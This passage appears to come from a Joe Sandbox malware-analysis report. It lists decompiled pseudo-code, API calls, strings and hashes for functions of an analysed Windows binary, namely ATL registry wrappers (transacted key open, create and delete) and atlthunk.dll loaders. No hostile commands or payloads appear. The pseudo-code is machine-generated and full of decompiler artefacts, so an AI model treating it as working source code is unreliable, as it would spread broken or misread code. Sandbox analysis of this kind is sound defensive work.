					_v16 = E009D1520(_t43, _t73 - _t73);
					__eflags = _v16;
					if(__eflags == 0) {
						goto L11;
					}
					_t49 = _v16(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_v8, 0);
					__eflags = _t73 - _t73;
					_t35 = E009D1520(_t49, __eflags);
				} else {
					_t35 = 1;
				}
			}













                      0x00943207
                      0x0094320e
                      0x00943215
                      0x0094321c
                      0x00943225
                      0x009432de
                      0x009432e2
                      0x00943319
                      0x00943319
                      0x0094331f
                      0x0094332c
                      0x0094332c
                      0x0094330a
                      0x00943310
                      0x00943312
                      0x00000000
                      0x00943312
                      0x0094323f
                      0x00943242
                      0x00943246
                      0x00943260
                      0x00943265
                      0x0094326b
                      0x0094326d
                      0x0094326d
                      0x0094326b
                      0x00943272
                      0x00943289
                      0x0094328f
                      0x00943296
                      0x00943299
                      0x0094329d
                      0x00000000
                      0x009432d9
                      0x009432cd
                      0x009432d0
                      0x009432d2
                      0x00943274
                      0x00943274
                      0x00943274

                      APIs
                      • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00943232
                      • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedA), ref: 00943289
                      • RegCreateKeyExA.ADVAPI32(CCCCCCCC,CCCCCCCC,?,?,?,?,?,?,?), ref: 0094330A
                      Strings
                      • %ls, xrefs: 0094324D
                      • RegCreateKeyTransactedA, xrefs: 00943280
                      • hAdvAPI32 != 0, xrefs: 00943248
                      • Advapi32.dll, xrefs: 0094322D
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltransactionmanager.h, xrefs: 00943259
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: AddressCreateHandleModuleProc
                      • String ID: %ls$Advapi32.dll$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltransactionmanager.h$RegCreateKeyTransactedA$hAdvAPI32 != 0
                      • API String ID: 1964897782-1911401746
                      • Opcode ID: f1acd41f2e832151ea490d534bd55f3669b9ba8c414acdc181acd5771b99ecda
                      • Instruction ID: 673cbd52992ab302eecaae4a99b51b8ce3538a095a2ebe8897de052a6a3a80ad
                      • Opcode Fuzzy Hash: f1acd41f2e832151ea490d534bd55f3669b9ba8c414acdc181acd5771b99ecda
                      • Instruction Fuzzy Hash: 51311972A04108BFCB14DF9DD885FDE77B9AB88744F10C249F919A7254D674DE80CBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009430F0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 90registrylibraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 83%
                      			E009430F0(intOrPtr __ecx, void* __esi, void* _a4, char* _a8, int _a12, int _a16, void** _a20) {
				intOrPtr* _v8;
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _v16;
				void* _t27;
				long _t31;
				_Unknown_base(*)()* _t34;
				void* _t39;
				void* _t40;
				void* _t56;
				void* _t57;

				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				if( *_v8 == 0) {
					__eflags =  *((intOrPtr*)(_v8 + 4));
					if(__eflags == 0) {
						L11:
						_t27 = 1;
						L12:
						return E009D1520(_t27, _t56 - _t57 + 0xc);
					}
					_t31 = RegOpenKeyExA(_a4, _a8, _a12, _a16, _a20);
					__eflags = _t57 - _t57;
					_t27 = E009D1520(_t31, __eflags);
					goto L12;
				}
				_v12 = E009D1520(GetModuleHandleA("Advapi32.dll"), _t57 - _t57);
				_t61 = _v12;
				if(_v12 == 0) {
					_t40 = L00994930(_t61, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atltransactionmanager.h", 0x255, 0, "%ls", L"hAdvAPI32 != 0");
					_t57 = _t57 + 0x18;
					if(_t40 == 1) {
						asm("int3");
					}
				}
				if(_v12 != 0) {
					_t34 = GetProcAddress(_v12, "RegOpenKeyTransactedA");
					__eflags = _t57 - _t57;
					_v16 = E009D1520(_t34, _t57 - _t57);
					__eflags = _v16;
					if(__eflags == 0) {
						goto L11;
					}
					_t39 = _v16(_a4, _a8, _a12, _a16, _a20,  *_v8, 0);
					__eflags = _t57 - _t57;
					_t27 = E009D1520(_t39, __eflags);
				} else {
					_t27 = 1;
				}
			}













                      0x009430f7
                      0x009430fe
                      0x00943105
                      0x0094310c
                      0x00943115
                      0x009431be
                      0x009431c2
                      0x009431e9
                      0x009431e9
                      0x009431ef
                      0x009431fc
                      0x009431fc
                      0x009431da
                      0x009431e0
                      0x009431e2
                      0x00000000
                      0x009431e2
                      0x0094312f
                      0x00943132
                      0x00943136
                      0x00943150
                      0x00943155
                      0x0094315b
                      0x0094315d
                      0x0094315d
                      0x0094315b
                      0x00943162
                      0x00943179
                      0x0094317f
                      0x00943186
                      0x00943189
                      0x0094318d
                      0x00000000
                      0x009431b9
                      0x009431ad
                      0x009431b0
                      0x009431b2
                      0x00943164
                      0x00943164
                      0x00943164

                      APIs
                      • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00943122
                      • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedA), ref: 00943179
                      • RegOpenKeyExA.ADVAPI32(CCCCCCCC,CCCCCCCC,?,?,?), ref: 009431DA
                      Strings
                      • %ls, xrefs: 0094313D
                      • hAdvAPI32 != 0, xrefs: 00943138
                      • Advapi32.dll, xrefs: 0094311D
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltransactionmanager.h, xrefs: 00943149
                      • RegOpenKeyTransactedA, xrefs: 00943170
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: AddressHandleModuleOpenProc
                      • String ID: %ls$Advapi32.dll$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltransactionmanager.h$RegOpenKeyTransactedA$hAdvAPI32 != 0
                      • API String ID: 1337834000-1483138269
                      • Opcode ID: 8f517c41e0eb7e242b46a4525a15e4911667a1400f2c5cda06b21680b2eb3828
                      • Instruction ID: 3d3f4892edf181d06399effcb695b8225bba3a0a82631db35a9a28311ccc6e2c
                      • Opcode Fuzzy Hash: 8f517c41e0eb7e242b46a4525a15e4911667a1400f2c5cda06b21680b2eb3828
                      • Instruction Fuzzy Hash: 03313C72E44208BFCB10EF99D886F9E77B9AB88740F10C149F505A7291D2799E80CBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00944310 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 87registrylibraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 66%
                      			E00944310(void** __ecx, void* __esi, char* _a4) {
				void** _v8;
				struct HINSTANCE__* _v12;
				long _t23;
				void* _t24;
				void* _t27;
				struct HINSTANCE__* _t28;
				_Unknown_base(*)()* _t31;
				void* _t34;
				void* _t48;
				void* _t53;
				void* _t54;

				_t48 = __esi;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				do {
					_t56 =  *_v8;
					if( *_v8 == 0) {
						_t34 = L00994930(_t56, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x167c, 0, "%ls", L"m_hKey != 0");
						_t54 = _t54 + 0x18;
						if(_t34 == 1) {
							asm("int3");
						}
					}
				} while (0 != 0);
				if(_v8[2] == 0) {
					__eflags =  *0xb33698 & 0x000000ff;
					if(( *0xb33698 & 0x000000ff) == 0) {
						_t28 = GetModuleHandleA("Advapi32.dll");
						__eflags = _t54 - _t54;
						_v12 = E009D1520(_t28, _t54 - _t54);
						__eflags = _v12;
						if(_v12 != 0) {
							_t31 = GetProcAddress(_v12, "RegDeleteKeyExA");
							__eflags = _t54 - _t54;
							 *0xb315dc = E009D1520(_t31, _t54 - _t54);
						}
						 *0xb33698 = 1;
					}
					__eflags =  *0xb315dc;
					if( *0xb315dc == 0) {
						_t23 = RegDeleteKeyA( *_v8, _a4);
						__eflags = _t54 - _t54;
						_t24 = E009D1520(_t23, __eflags);
					} else {
						_t27 =  *0xb315dc( *_v8, _a4, _v8[1], 0);
						__eflags = _t54 - _t54;
						_t24 = E009D1520(_t27, __eflags);
					}
				} else {
					_t24 = E00943330(_v8[2], _t48,  *_v8, _a4);
				}
				return E009D1520(_t24, _t53 - _t54 + 8);
			}














                      0x00944310
                      0x00944317
                      0x0094431e
                      0x00944325
                      0x00944328
                      0x0094432b
                      0x0094432e
                      0x00944348
                      0x0094434d
                      0x00944353
                      0x00944355
                      0x00944355
                      0x00944353
                      0x00944356
                      0x00944361
                      0x00944384
                      0x00944386
                      0x0094438f
                      0x00944395
                      0x0094439c
                      0x0094439f
                      0x009443a3
                      0x009443b0
                      0x009443b6
                      0x009443bd
                      0x009443bd
                      0x009443c2
                      0x009443c2
                      0x009443c9
                      0x009443d0
                      0x00944402
                      0x00944408
                      0x0094440a
                      0x009443d2
                      0x009443e7
                      0x009443ed
                      0x009443ef
                      0x009443ef
                      0x00944363
                      0x00944373
                      0x00944373
                      0x0094441d

                      APIs
                      • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 0094438F
                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExA), ref: 009443B0
                      • RegDeleteKeyA.ADVAPI32(00000000,CCCCCCCC), ref: 00944402
                      Strings
                      • %ls, xrefs: 00944335
                      • m_hKey != 0, xrefs: 00944330
                      • Advapi32.dll, xrefs: 0094438A
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00944341
                      • RegDeleteKeyExA, xrefs: 009443A7
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: AddressDeleteHandleModuleProc
                      • String ID: %ls$Advapi32.dll$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$RegDeleteKeyExA$m_hKey != 0
                      • API String ID: 588496660-3303359461
                      • Opcode ID: 145105d481913b5e348bccaf80a177221812079bdaaf2264cacc805c112de11c
                      • Instruction ID: 80c78d06ec10bc7a0f3fa8982e4008b63ab65786d381c24d636d555d3ef09235
                      • Opcode Fuzzy Hash: 145105d481913b5e348bccaf80a177221812079bdaaf2264cacc805c112de11c
                      • Instruction Fuzzy Hash: D131F536E40208FFC710EF98D986FAE77B9AB84744F248159F5059B391DB749E80CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00943330 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 80registrylibraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 83%
                      			E00943330(intOrPtr __ecx, void* __esi, void* _a4, char* _a8) {
				intOrPtr* _v8;
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _v16;
				void* _t21;
				long _t24;
				_Unknown_base(*)()* _t27;
				void* _t31;
				void* _t32;
				void* _t44;
				void* _t45;

				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				if( *_v8 == 0) {
					__eflags =  *((intOrPtr*)(_v8 + 4));
					if(__eflags == 0) {
						L11:
						_t21 = 1;
						L12:
						return E009D1520(_t21, _t44 - _t45 + 0xc);
					}
					_t24 = RegDeleteKeyA(_a4, _a8);
					__eflags = _t45 - _t45;
					_t21 = E009D1520(_t24, __eflags);
					goto L12;
				}
				_v12 = E009D1520(GetModuleHandleA("Advapi32.dll"), _t45 - _t45);
				_t49 = _v12;
				if(_v12 == 0) {
					_t32 = L00994930(_t49, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atltransactionmanager.h", 0x29c, 0, "%ls", L"hAdvAPI32 != 0");
					_t45 = _t45 + 0x18;
					if(_t32 == 1) {
						asm("int3");
					}
				}
				if(_v12 != 0) {
					_t27 = GetProcAddress(_v12, "RegDeleteKeyTransactedA");
					__eflags = _t45 - _t45;
					_v16 = E009D1520(_t27, _t45 - _t45);
					__eflags = _v16;
					if(__eflags == 0) {
						goto L11;
					}
					_t31 = _v16(_a4, _a8, 0, 0,  *_v8, 0);
					__eflags = _t45 - _t45;
					_t21 = E009D1520(_t31, __eflags);
				} else {
					_t21 = 1;
				}
			}













                      0x00943337
                      0x0094333e
                      0x00943345
                      0x0094334c
                      0x00943355
                      0x009433f3
                      0x009433f7
                      0x00943412
                      0x00943412
                      0x00943418
                      0x00943425
                      0x00943425
                      0x00943403
                      0x00943409
                      0x0094340b
                      0x00000000
                      0x0094340b
                      0x0094336f
                      0x00943372
                      0x00943376
                      0x00943390
                      0x00943395
                      0x0094339b
                      0x0094339d
                      0x0094339d
                      0x0094339b
                      0x009433a2
                      0x009433b6
                      0x009433bc
                      0x009433c3
                      0x009433c6
                      0x009433ca
                      0x00000000
                      0x009433ee
                      0x009433e2
                      0x009433e5
                      0x009433e7
                      0x009433a4
                      0x009433a4
                      0x009433a4

                      APIs
                      • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00943362
                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 009433B6
                      • RegDeleteKeyA.ADVAPI32(CCCCCCCC,CCCCCCCC), ref: 00943403
                      Strings
                      • %ls, xrefs: 0094337D
                      • hAdvAPI32 != 0, xrefs: 00943378
                      • RegDeleteKeyTransactedA, xrefs: 009433AD
                      • Advapi32.dll, xrefs: 0094335D
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltransactionmanager.h, xrefs: 00943389
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: AddressDeleteHandleModuleProc
                      • String ID: %ls$Advapi32.dll$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltransactionmanager.h$RegDeleteKeyTransactedA$hAdvAPI32 != 0
                      • API String ID: 588496660-2197841288
                      • Opcode ID: 2bcc338614b894c94d292df82b3e0f6d3a3967a6bea3867f9cad0e2dae7ecfee
                      • Instruction ID: 5a6d863b733b150c08b1396e9a4f624214829dd3154404030ecc64d6c8aff5b3
                      • Opcode Fuzzy Hash: 2bcc338614b894c94d292df82b3e0f6d3a3967a6bea3867f9cad0e2dae7ecfee
                      • Instruction Fuzzy Hash: 30218E32E44208FBCB10EBA9D84AF9EBB74AB84704F50C195F5056B291D7B99E80CBD1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009566BA Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58libraryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 54%
                      			E009566BA(void* __ecx, intOrPtr* _a4) {
				void* _v8;
				struct HINSTANCE__* _t4;
				intOrPtr* _t5;
				intOrPtr* _t11;

				if( *0xb3021c == 0) {
					_t4 = LoadLibraryExA("atlthunk.dll", 0, 0x800);
					_t15 = _t4;
					if(_t4 == 0 || E0095697D(_t15, "AtlThunk_AllocateData", 0xb3020c) == 0 || E0095697D(_t15, "AtlThunk_InitData", 0xb30210) == 0 || E0095697D(_t15, "AtlThunk_DataToCode", 0xb30214) == 0 || E0095697D(_t15, "AtlThunk_FreeData", 0xb30218) == 0) {
						_t5 = 0;
					} else {
						asm("lock or [eax], ecx");
						_t5 = _a4;
						 *0xb3021c = 1;
						__imp__DecodePointer( *_t5);
					}
					return _t5;
				} else {
					_t11 = _a4;
					__imp__DecodePointer( *_t11);
					return _t11;
				}
			}







                      0x009566c5
                      0x009566e1
                      0x009566e7
                      0x009566eb
                      0x00956765
                      0x00956749
                      0x0095674e
                      0x00956751
                      0x00956754
                      0x0095675d
                      0x0095675d
                      0x00956769
                      0x009566c7
                      0x009566c7
                      0x009566cc
                      0x009566d3
                      0x009566d3

                      APIs
                      • DecodePointer.KERNEL32(?,?,?,00956BEE,00B30214,?,?,?,?,00944D19), ref: 009566CC
                      • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,00956BEE,00B30214,?,?,?,?,00944D19), ref: 009566E1
                      • DecodePointer.KERNEL32(?), ref: 0095675D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: DecodePointer$LibraryLoad
                      • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                      • API String ID: 1423960858-1745123996
                      • Opcode ID: 209fa837fc80c9a26350b82c50d15392487b7053151ffbf257140dd832f45261
                      • Instruction ID: 79cd4882effdb6de572ebf8188b0138b3059f2f16e09b44f9622a0b13f17fcae
                      • Opcode Fuzzy Hash: 209fa837fc80c9a26350b82c50d15392487b7053151ffbf257140dd832f45261
                      • Instruction Fuzzy Hash: 9D01C4306D53047BDA05FB12ED1BB8B3FA85F42B4AF544091BC01A72A3EAA1890ED791
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0095676A Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58libraryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 54%
                      			E0095676A(void* __ecx, intOrPtr* _a4) {
				void* _v8;
				struct HINSTANCE__* _t4;
				intOrPtr* _t5;
				intOrPtr* _t11;

				if( *0xb3021c == 0) {
					_t4 = LoadLibraryExA("atlthunk.dll", 0, 0x800);
					_t15 = _t4;
					if(_t4 == 0 || E0095697D(_t15, "AtlThunk_AllocateData", 0xb3020c) == 0 || E0095697D(_t15, "AtlThunk_InitData", 0xb30210) == 0 || E0095697D(_t15, "AtlThunk_DataToCode", 0xb30214) == 0 || E0095697D(_t15, "AtlThunk_FreeData", 0xb30218) == 0) {
						_t5 = 0;
					} else {
						asm("lock or [eax], ecx");
						_t5 = _a4;
						 *0xb3021c = 1;
						__imp__DecodePointer( *_t5);
					}
					return _t5;
				} else {
					_t11 = _a4;
					__imp__DecodePointer( *_t11);
					return _t11;
				}
			}







                      0x00956775
                      0x00956791
                      0x00956797
                      0x0095679b
                      0x00956815
                      0x009567f9
                      0x009567fe
                      0x00956801
                      0x00956804
                      0x0095680d
                      0x0095680d
                      0x00956819
                      0x00956777
                      0x00956777
                      0x0095677c
                      0x00956783
                      0x00956783

                      APIs
                      • DecodePointer.KERNEL32(?,?,?,00956B8C,00B3020C,?,?,00944CBB), ref: 0095677C
                      • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,00000000,?,?,00956B8C,00B3020C,?,?,00944CBB), ref: 00956791
                      • DecodePointer.KERNEL32(?), ref: 0095680D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: DecodePointer$LibraryLoad
                      • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                      • API String ID: 1423960858-1745123996
                      • Opcode ID: 209fa837fc80c9a26350b82c50d15392487b7053151ffbf257140dd832f45261
                      • Instruction ID: 6135c025f616519ccf9b1b12e117faf1bfe79d9db48ea59a8bded32794f7034a
                      • Opcode Fuzzy Hash: 209fa837fc80c9a26350b82c50d15392487b7053151ffbf257140dd832f45261
                      • Instruction Fuzzy Hash: 9701C4706D53047BCA05EB12DC1BB8B3B984F42B4AF5480A1BD01672A3EAB1890EC792
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009568CA Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58libraryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 54%
                      			E009568CA(void* __ecx, intOrPtr* _a4) {
				void* _v8;
				struct HINSTANCE__* _t4;
				intOrPtr* _t5;
				intOrPtr* _t11;

				if( *0xb3021c == 0) {
					_t4 = LoadLibraryExA("atlthunk.dll", 0, 0x800);
					_t15 = _t4;
					if(_t4 == 0 || E0095697D(_t15, "AtlThunk_AllocateData", 0xb3020c) == 0 || E0095697D(_t15, "AtlThunk_InitData", 0xb30210) == 0 || E0095697D(_t15, "AtlThunk_DataToCode", 0xb30214) == 0 || E0095697D(_t15, "AtlThunk_FreeData", 0xb30218) == 0) {
						_t5 = 0;
					} else {
						asm("lock or [eax], ecx");
						_t5 = _a4;
						 *0xb3021c = 1;
						__imp__DecodePointer( *_t5);
					}
					return _t5;
				} else {
					_t11 = _a4;
					__imp__DecodePointer( *_t11);
					return _t11;
				}
			}







                      0x009568d5
                      0x009568f1
                      0x009568f7
                      0x009568fb
                      0x00956975
                      0x00956959
                      0x0095695e
                      0x00956961
                      0x00956964
                      0x0095696d
                      0x0095696d
                      0x00956979
                      0x009568d7
                      0x009568d7
                      0x009568dc
                      0x009568e3
                      0x009568e3

                      APIs
                      • DecodePointer.KERNEL32(?,CCCCCCCC,?,00956C96,00B30210,?,?,?,00944CDF,?,?,?), ref: 009568DC
                      • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,CCCCCCCC,?,00956C96,00B30210,?,?,?,00944CDF,?,?,?), ref: 009568F1
                      • DecodePointer.KERNEL32(?), ref: 0095696D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: DecodePointer$LibraryLoad
                      • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                      • API String ID: 1423960858-1745123996
                      • Opcode ID: 209fa837fc80c9a26350b82c50d15392487b7053151ffbf257140dd832f45261
                      • Instruction ID: e20856c99aee56582abe752f4ee98b81de3a003c1ee66ff47d10d70810e69232
                      • Opcode Fuzzy Hash: 209fa837fc80c9a26350b82c50d15392487b7053151ffbf257140dd832f45261
                      • Instruction Fuzzy Hash: DF01AD316952047BCB05EB22DC2BB8B3BA85F4374AF544091BC45672A3EAB18A0EC7D5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0095681A Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58libraryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 54%
                      			E0095681A(void* __ecx, intOrPtr* _a4) {
				void* _v8;
				struct HINSTANCE__* _t4;
				intOrPtr* _t5;
				intOrPtr* _t11;

				if( *0xb3021c == 0) {
					_t4 = LoadLibraryExA("atlthunk.dll", 0, 0x800);
					_t15 = _t4;
